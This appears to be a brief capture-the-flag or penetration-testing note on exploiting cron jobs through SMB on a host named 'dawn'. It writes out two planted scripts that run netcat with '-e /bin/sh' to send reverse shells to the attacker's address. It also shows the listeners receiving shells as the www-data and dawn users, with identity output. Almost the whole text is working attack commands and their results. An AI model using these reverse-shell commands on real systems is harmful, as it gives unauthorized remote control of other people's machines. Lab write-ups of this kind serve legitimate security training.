3 cron exploit using smb

# creating two files
# tried using /bin/bash or bash => connection would come but then break; so using /bin/sh
$ cat product-control
#!/bin/bash
nc 192.168.49.105 6969 -e /bin/sh                                                                                     

$ cat web-control
#!/bin/bash
nc 192.168.49.105 7070 -e /bin/sh 

7070 =>
$ nc -lvnp 7070
listening on [any] 7070 ...
connect to [192.168.49.105] from (UNKNOWN) [192.168.105.11] 47142
whoami;id;hostname
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
dawn

$ nc -lvnp 6969
listening on [any] 6969 ...
connect to [192.168.49.105] from (UNKNOWN) [192.168.105.11] 38166
whoami;id;hostname
dawn
uid=1000(dawn) gid=1000(dawn) groups=1000(dawn),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),115(lpadmin),116(scanner)
dawn

Last updated